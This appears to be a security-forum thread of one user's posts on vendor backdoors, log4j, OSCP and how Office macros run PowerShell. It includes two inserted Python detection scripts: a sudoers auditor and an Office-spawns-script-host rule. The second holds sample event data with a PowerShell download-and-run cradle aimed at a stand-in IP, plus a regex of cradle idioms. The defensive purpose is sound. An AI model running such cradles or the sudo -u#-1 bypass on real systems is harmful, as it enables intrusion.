FungiCap
Jul 23, 2007

Let's all just calm down and put on our thinking caps.

Shinku ABOOKEN posted:

any of you worked in non-operations infosec? i.e. dealing with risk analysis and policies and poo poo like that? how do you stay engaged?

I couldn't. Eventually, being surrounded by people who don't actually know how computers work but dictate policy for them starts to eat at your brain and you have to move on.

FungiCap

They should use double DES to double their security.

FungiCap

The scourge of '13 we used to call it.

FungiCap

GDPR US Equivalent now.

FungiCap

Metadata's a bitch.

FungiCap

Fortinet was formed by a group of people who previously made the Juniper Netscreen firewalls before they split off and made their own company.

Juniper Screen firewalls also had a hardcoded backdoor:

https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/

Not a great track record.

FungiCap

Someone's about to have a really loving bad day.

FungiCap

Sweet Jesus, the OP's comment in that thread is amazing as well:

Reddit Guy posted:

I know what machine is it, I know rdp port is forward to that machine. But no logs in the rdp sessions. Maybe rdp is "pinging " something?

FungiCap

quote:

myhost bob = (ALL, !root) /usr/bin/vi

I don't think I've ever seen a sudoers file configured in this manner, but I guess I'll toss it in the bin with the rest of the "priv esc under very specific conditions" bucket (there are thousands of things in this bucket). I'm sure it will show up in a CTF box one day.
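The rule quoted above is the shape worth grepping a fleet's sudoers for, so here is an added audit script (mine, not anything from the thread). It parses user specs in sudo's "User Host = (Runas) [Tag:] Cmnd" grammar (the sample rewrites the quoted line in that order), flags a Runas list of the "ALL minus someone" kind, and separately flags commands with a built-in shell escape such as vi. The "very specific condition" the '!' form is known for: sudo before 1.8.28 accepted -u#-1 (and -u#4294967295) past the !root exclusion and ran the command as uid 0 (CVE-2019-14287). The sudoers content below is constructed for the demo.

```python
"""Audit sudoers user specs for Runas exclusions like "(ALL, !root)".

Added example, not code from the thread. The sample sudoers text is
constructed and is not taken from any real host.
"""
import re

# Constructed sudoers content for the demonstration.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL = (ALL:ALL) ALL
bob     myhost = (ALL, !root) /usr/bin/vi
alice   ALL = (ALL) NOPASSWD: /usr/bin/systemctl restart nginx
carol   ALL = (ALL, !root) ALL
dave    ALL = (www-data) /usr/bin/less
Defaults env_reset
"""

# User_Spec ::= User_List Host_List '=' [ '(' Runas_List ')' ] [ Tag ':' ] Cmnd_List
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmnds>.+?)\s*$"
)

# Editors and pagers with a built-in shell escape (":!sh" in vi, "!sh" in less):
# running one of these via sudo as another user is a shell as that user.
SHELL_ESCAPES = {"/usr/bin/vi", "/usr/bin/vim", "/usr/bin/less", "/usr/bin/more"}

NON_SPEC_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_spec(line):
    """Return (user, host, runas_users, cmnds) for a user spec line, else None."""
    line = line.split("#", 1)[0].strip()   # '#' comments (no #include/#uid forms in the sample)
    if not line or line.startswith(NON_SPEC_PREFIXES):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    # Runas_List is "users" or "users:groups"; only the user half matters here.
    runas = (m.group("runas") or "").split(":", 1)[0]
    runas_users = [u.strip() for u in runas.split(",") if u.strip()]
    cmnds = [c.strip() for c in m.group("cmnds").split(",")]
    return m.group("user"), m.group("host"), runas_users, cmnds


def command_binary(cmnd):
    """Strip leading tags (NOPASSWD:, SETENV:, ...) and return the program path."""
    toks = cmnd.split()
    while toks and toks[0].endswith(":"):
        toks.pop(0)
    return toks[0] if toks else ""


def audit_sudoers(text):
    """Return one finding per risky rule: {'user', 'line', 'reasons'}."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_spec(raw)
        if parsed is None:
            continue
        user, _host, runas_users, cmnds = parsed
        reasons = []
        negated = [u[1:] for u in runas_users if u.startswith("!")]
        if negated and "ALL" in runas_users:
            reasons.append(
                "Runas is ALL minus %s: '!' is not a safe way to exclude a target user; "
                "sudo before 1.8.28 mapped -u#-1 to uid 0 past this check (CVE-2019-14287)"
                % ", ".join(negated))
        escapable = [b for b in map(command_binary, cmnds) if b in SHELL_ESCAPES]
        if escapable and runas_users != [user]:   # an empty Runas_List means root
            reasons.append("%s has a shell escape, so this is a shell as the Runas user"
                           % ", ".join(escapable))
        if reasons:
            findings.append({"user": user, "line": raw.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f["line"])
        for r in f["reasons"]:
            print("   -", r)
```

Run it against `sudo -l`-style dumps or the files under /etc/sudoers.d; aliases are not expanded here, so a rule hidden behind a Runas_Alias needs the alias resolved first.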

FungiCap

Thought that aspect of the Equifax breach had been known since around when the story first broke?

https://www.miamiherald.com/news/nation-world/world/article173136746.html

Sept 2017.

FungiCap

On the other hand, free pen testing.

FungiCap

CyberPingu posted:

Welp, booking OSCP exam today.

Good luck, friend. Extreme lurker here, but if you need to bounce questions off of me or several other goons who have taken it, PM me. If you have enough confidence to post about it here, you're probably ready, because there are several people ITT who I have referred to over the years that are way smarter than me.

Special shout out especially to whoever ITT made https://tls13.ulfheim.net/, which I have referenced several times to help educate colleagues in more ways than one. Simplifying complex ideas in this way is an underrated skill that will only become more important as time goes on. I really appreciate this resource; it truly wraps a ton of different security concepts into a single thing that can be broken down to the simplest level.

Thanks, thread. It's possible I will never post here again due to Dunning-Kruger, but a lot of you out there have helped me, and surely others in the cyber security field, by questioning beliefs and pushing to learn more as a result </drunk posting>

FungiCap fucked around with this message at 04:16 on Jan 17, 2021

FungiCap

SCADA and internet access, name a better combo.

FungiCap

Sarah Problem posted:

Some gently caress head is randomly scanning an RFID at our smart card readers on the outside of our offices with a god drat jndi payload and the loving controller actually tried to call back. God drat you log4j. I only found it when scanning for outbound traffic attempts on our firewall. I found the payload when I grepped its logs. gently caress this poo poo

Are you willing to share the name of the vendor of the controller?

FungiCap

Holy poo poo, I knew it. iStars with their compact edition windows pieces of poo poo. goddamn the software for the physical security industry sucks rear end

FungiCap

Why write memory-safe code when you can pay a third party for an EAC license and just hook your functions with code you never vetted!

FungiCap

Ulf posted:

hey what would be more interesting to people itt, a byte-by-byte breakdown of DTLS 1.2, or of QUIC?

(trying to pick my next rainy-day project)

i'm leaning towards QUIC but i haven't really worked with either of them to this point. QUIC has more real-world uptake afaik. not saying they're equivalent to each other, but i only want to commit to doing one.

EDIT: This would be along the lines of my last two projects:

No preference, but just wanted to say cheers for making these. I've shown your TLS diagrams to several people now and everyone agrees that it's a great visual representation breakdown of TLS.

FungiCap

Ulf posted:

hi yossec! clicking here will make all your dreams come true:

https://quic.ulfheim.net

You are a beast.

FungiCap

This is a neat exploit, and I can confirm it works, but it shares so many similarities with CVE-2021-40444 that I haven't been able to get it past any endpoint defense product yet without being identified as malware.

FungiCap

BrianRx posted:

Nothing, I guess. My confusion is around how the exploit, which inherits its level of privilege from the application from which it was invoked, is able to install software or execute certain commands in PowerShell when that application does not have privileges to do so.

And that answers my question, thanks.

Child processes (powershell) in Windows inherit the security permissions of the account running the parent process (office application). You do not need any administrator permissions to run code as a regular user. Open powershell as a user and type 1+1. Congrats, you executed code as a user. Open notepad as a user; congrats, you executed code again as a user. Open the infected office document as a user; congrats, powershell also spawned as a user.

Instead of 1+1 it could also just be "download and execute these instructions". Again, you don't need special permissions to do that (although endpoint protection will probably stop it).

FungiCap fucked around with this message at 12:56 on Jun 1, 2022
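Because the child inherits the parent's token, the thing to alert on is not privilege but lineage: an Office process should essentially never be the parent of a script host. Added example, mine and not from the thread: a small rule over process-creation events in the shape of Sysmon Event ID 1 fields (Image, ParentImage, User, IntegrityLevel, CommandLine). The events are constructed; the paths, the user name and the 198.51.100.9 address are made up. The IntegrityLevel on the flagged event is Medium, which is the post's point in one field: the document ran code as the logged-on user and nothing was elevated.

```python
"""Flag Office applications spawning a script host.

Added example, not from the thread. Events are constructed in the shape
of Sysmon Event ID 1 fields; paths, user and addresses are made up.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Download-and-run idioms that show up in first-stage command lines.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|-e(?:nc|ncodedcommand)?\b|frombase64string", re.I)

EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe", "IntegrityLevel": "Medium",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.docx"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "User": r"CORP\jdoe", "IntegrityLevel": "Medium",   # copied from WINWORD's token
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.9/s')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe"},           # a user opening a console: no alert
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "User": r"CORP\jdoe", "IntegrityLevel": "Medium",
     "CommandLine": r'"EXCEL.EXE" /dde'},        # Office opening Office: not a script host
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag(event):
    """Return a finding if an Office app is the parent of a script host, else None."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    return {
        "parent": parent,
        "child": child,
        "user": event["User"],
        # The child's token is a copy of the parent's: Medium means the document
        # ran code as the logged-on user, with no elevation anywhere in the chain.
        "integrity": event["IntegrityLevel"],
        "download_cradle": bool(CRADLE_RE.search(event["CommandLine"])),
    }


def scan(events):
    """Apply flag() to a list of events and keep the findings."""
    return [f for f in map(flag, events) if f is not None]


if __name__ == "__main__":
    for f in scan(EVENTS):
        print("%s -> %s as %s (%s integrity, cradle=%s)"
              % (f["parent"], f["child"], f["user"], f["integrity"], f["download_cradle"]))
```

The same parent/child predicate is what goes into a SIEM rule over Sysmon 1 or Security 4688 events; for 4688 the command-line field is empty unless "Include command line in process creation events" is turned on in audit policy, so the cradle check only works once that is enabled.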

FungiCap

Okay who hosed up all the electron apps?

Context: MS Defender pushed a bad update that was flagging all electron apps as malware. It was a pretty brief window before being fixed in the early AM so most probably missed it (maybe Defender is right though).

FungiCap fucked around with this message at 12:06 on Sep 5, 2022

FungiCap

Truman Peyote posted:

I'm Canadian but I'm spending a few weeks in Portugal. Today I'm at a coworking space, and they asked me to pay using PayPal. I tried to log in and it showed me a 2FA screen that would send a text message to my Canadian number. Oh poo poo, I thought, I don't have my Canadian SIM. But what's this, a button for changing my phone number right there on the 2FA screen...?

yep, I was able to just add the number on the phone in my hand, get the text, and log in. huge peace of mind knowing this extra layer of security is here

lmfao

FungiCap

Please sit down everyone.

Nearly every ISP is selling 100% of their netflow information to the government.

https://www.vice.com/en/article/y3pnkw/us-military-bought-mass-monitoring-augury-team-cymru-browsing-email-data

I know you're all shocked. Please remain calm.

FungiCap

Shaggar posted:

sure, but in this given context the US is probably actively looking to aid in the current protests against iran. worst case scenario you get on some list of potential assets for future exploitation.

plus you gotta remember that they cant always see everything. if its https over TOR they can only get so much intel on you from your traffic alone. in that sense think of TOR more like an open wifi access point run by the US Government for the benefit of its friends (or potential friends) abroad.

I thought HTTPS over TOR was verboten due to meta data leaks from it.

FungiCap

Neito posted:

Same.

Is there any reason not to do v6 at this point other than straight-up laziness?

Big numbers are scary.

FungiCap

The answer to ipv4 woes is always just another layer of NAT!

I'm legitimately wondering if we will ever see mass IPv6 adoption in our lifetimes and I'm not even that old.

Using a VM that NATs through my host machine, which NATs through my home router, which NATs through my carrier level.

FungiCap fucked around with this message at 19:46 on Oct 18, 2022

FungiCap

Any security team that isn't pissing off devs probably isn't doing their job.

FungiCap

Critical vulnerability: Use of OpenSSL 3.X causes incurable existential dread.

FungiCap

Sickening posted:

I saw what the paycheck of a total moron who happened to work in information security was and decided "I could do that".

FungiCap

Naming my new hash cracker 'Saltine'

FungiCap

rafikki posted:

Patch your fortis:

Summary
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

Exploitation status:
Fortinet is aware of an instance where this vulnerability was exploited in the wild, and recommends immediately validating your systems against the following indicators of compromise:

https://www.fortiguard.com/psirt/FG-IR-22-398

Then throw it in the trash where it belongs.

FungiCap

post hole digger posted:

fortigates fine.

Same devs who made Juniper Screen. Hard disagree, but I guess ymmv.

I would like to remind you at this time that it's the same people who hard-coded an intentional backdoor account and not even for the NSA this time!

FungiCap fucked around with this message at 20:34 on Dec 12, 2022

FungiCap

Like, I'll cop to the fact that all of these devices kind of suck in their own way so you just need to find the best of the worst and suck it up, but Fortinet and their lovely devices were literally ruining my life in 2016 and I will never stop hating them.

FungiCap

I tried to read his book once on someone's recommendation and got about 1/3rd through before I had to stop.

It's pretty masturbatory, even by autobiography standards.

FungiCap

congrats okta for going open source.

FungiCap

kitten smoothie posted:

I still like the Symantec corporate malware tool we had at an old job that would randomly fail one in every one hundred builds or so by falsely alerting on intermediate build products and quarantining them mid build so the linker couldn’t find them later

+1 to this happening to one of our devs. The security product does not notify the user at all, and so the poor dev was practically pulling their hair out in confusion and frustration.

FungiCap

DELETE CASCADE posted:

his reasoning was something like, he's less likely to be physically mugged than to have his password leaked in some hack.

lol.

I think this is the kind of person though where if you force them to speak out their logic and point out a few things candidly they would realize some of the foolishness with this line of thinking.

FungiCap fucked around with this message at 21:26 on Jan 11, 2023

FungiCap

Possibly poor wording? Having a RAT on your target and proxying through them could be construed as "remotely" and is an incredibly common tactic to use once you have positive C2 on your target.

I'm giving the benefit of the doubt here. If that is what they meant, it was definitely worded really badly. Disclaimer: I didn't read the whole thing.

FungiCap

A colleague got DA immediately in an assessment many years ago because he sent a phish to a few employees and they correctly reported the phish.

A security engineer (of like, 20+ years experience!) then interacted with the malware on his domain machine to "research" the malware despite having no idea what that entails (like seriously, you don't have any reverse engineering experience at all, what do you think you're going to find out?). I don't know what the pivot step from there to DA was, but I'm gonna take a wild guess and say cleartext admin creds in a file on the desktop.

FungiCap

Encrypting the malware before moving it anywhere is standard operating procedure to render the payload inert. Always do this first if it wasn't received that way (and if it's not being received that way, ask yourself what the hell you're really doing lest you be like my security engineering friend).
